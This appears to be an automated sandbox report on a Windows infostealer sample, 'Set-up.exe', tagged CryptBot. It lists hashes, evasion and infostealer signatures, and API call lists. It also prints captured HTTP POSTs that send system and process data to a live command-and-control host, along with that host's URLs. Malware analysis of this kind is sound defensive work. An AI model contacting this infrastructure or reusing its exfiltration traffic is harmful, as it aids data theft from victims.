Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1582848
MD5:	3d060ec62ad0864cfd0d40f46a4f07a9
SHA1:	8caba4598d19477a1e4442c4c710fa3909023c5b
SHA256:	6f80bb8b470640ae7542eb1b239f2a790d61047254accccf747c4d64907fec66
Tags:	CryptBotexeuser-aachum
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Infostealer behavior detected

Leaks process information

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 5324 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 3D060EC62AD0864CFD0D40F46A4F07A9)

cleanup

Code function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,

0_2_0051255D

Source: global traffic

TCP traffic: 192.168.2.4:54676 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: /Content-Type: application/jsonContent-Length: 560661Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global traffic	HTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: /Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 34.200.57.114 34.200.57.114

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_005DA8C0 recvfrom,

0_2_005DA8C0

Source: global traffic

HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.eleventj11vt.top

Source: unknown

HTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 560661Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2

Source: Set-up.exe	String found in binary or memory: http://.css
Source: Set-up.exe	String found in binary or memory: http://.jpg
Source: Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olN
Source: Set-up.exe	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435
Source: Set-up.exe, Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3
Source: Set-up.exe, 00000000.00000002.1856204201.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854768134.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855090533.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853946639.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=
Source: Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN
Source: Set-up.exe	String found in binary or memory: http://html4/loose.dtd
Source: Set-up.exe	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ip
Source: Set-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipI
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005205B0	0_2_005205B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00526FA0	0_2_00526FA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005BE070	0_2_005BE070
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0089A000	0_2_0089A000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006800F0	0_2_006800F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00860032	0_2_00860032
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005E00E0	0_2_005E00E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0081C050	0_2_0081C050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0089E050	0_2_0089E050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00700080	0_2_00700080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007A0170	0_2_007A0170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00684170	0_2_00684170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0082C1A0	0_2_0082C1A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0077E138	0_2_0077E138
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00576210	0_2_00576210
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008862D0	0_2_008862D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006A0200	0_2_006A0200
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0086E2F0	0_2_0086E2F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007D42F0	0_2_007D42F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005862E0	0_2_005862E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00700350	0_2_00700350
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005DC320	0_2_005DC320
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005DE3E0	0_2_005DE3E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007CE450	0_2_007CE450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00672430	0_2_00672430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005E0420	0_2_005E0420
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00864410	0_2_00864410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006324A0	0_2_006324A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0055E480	0_2_0055E480
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00880460	0_2_00880460
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087C470	0_2_0087C470
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00890590	0_2_00890590
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008785A0	0_2_008785A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0077E5D0	0_2_0077E5D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00880560	0_2_00880560
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051E620	0_2_0051E620
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088A610	0_2_0088A610
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007D26E0	0_2_007D26E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00894780	0_2_00894780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005DC770	0_2_005DC770
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00698730	0_2_00698730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007587D0	0_2_007587D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00876730	0_2_00876730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006FA780	0_2_006FA780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008648A0	0_2_008648A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088A800	0_2_0088A800
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00524940	0_2_00524940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051A960	0_2_0051A960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005CC900	0_2_005CC900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006849F0	0_2_006849F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088E940	0_2_0088E940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00890940	0_2_00890940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006E6AC0	0_2_006E6AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00708AC0	0_2_00708AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087EA70	0_2_0087EA70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00596AA0	0_2_00596AA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007D0B70	0_2_007D0B70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00740B60	0_2_00740B60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00876BB0	0_2_00876BB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00888BF0	0_2_00888BF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0086CB00	0_2_0086CB00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006FABC0	0_2_006FABC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051CBB0	0_2_0051CBB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0089CC90	0_2_0089CC90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088CD80	0_2_0088CD80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005C2DC0	0_2_005C2DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00894D40	0_2_00894D40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00884D50	0_2_00884D50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0080CE30	0_2_0080CE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0082AE30	0_2_0082AE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00676E90	0_2_00676E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00836F80	0_2_00836F80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00862F90	0_2_00862F90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00534F70	0_2_00534F70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00638F20	0_2_00638F20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006FAFC0	0_2_006FAFC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005DEF90	0_2_005DEF90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006EF040	0_2_006EF040
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00713020	0_2_00713020
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0086F010	0_2_0086F010
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005210E6	0_2_005210E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00631140	0_2_00631140
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00701100	0_2_00701100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006ED1D0	0_2_006ED1D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006E1190	0_2_006E1190
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0069D230	0_2_0069D230
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005AB2D0	0_2_005AB2D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088B380	0_2_0088B380
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00697310	0_2_00697310
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007B33F0	0_2_007B33F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006FB3F0	0_2_006FB3F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008874A0	0_2_008874A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00633450	0_2_00633450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087D430	0_2_0087D430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087F430	0_2_0087F430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006EB4B0	0_2_006EB4B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008835B0	0_2_008835B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008635C0	0_2_008635C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008755E0	0_2_008755E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0051D5C0	0_2_0051D5C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_006FF5B0	0_2_006FF5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0057F5B0	0_2_0057F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008496B0	0_2_008496B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008656D0	0_2_008656D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0088B6F0	0_2_0088B6F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00879650	0_2_00879650
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007B36A0	0_2_007B36A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00885780	0_2_00885780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0058D740	0_2_0058D740
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008A17A0	0_2_008A17A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_008737E0	0_2_008737E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007097D0	0_2_007097D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0085B720	0_2_0085B720
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00887730	0_2_00887730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005B77E0	0_2_005B77E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00699790	0_2_00699790
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0087D890	0_2_0087D890
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005BB840	0_2_005BB840
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0069F850	0_2_0069F850
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00605830	0_2_00605830

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0052CCD0 appears 37 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 005175A0 appears 394 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00629720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 005F44A0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006C7310 appears 42 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006EC9B0 appears 78 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0051CAA0 appears 40 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006EA170 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 006ECBC0 appears 414 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 005173F0 appears 65 times
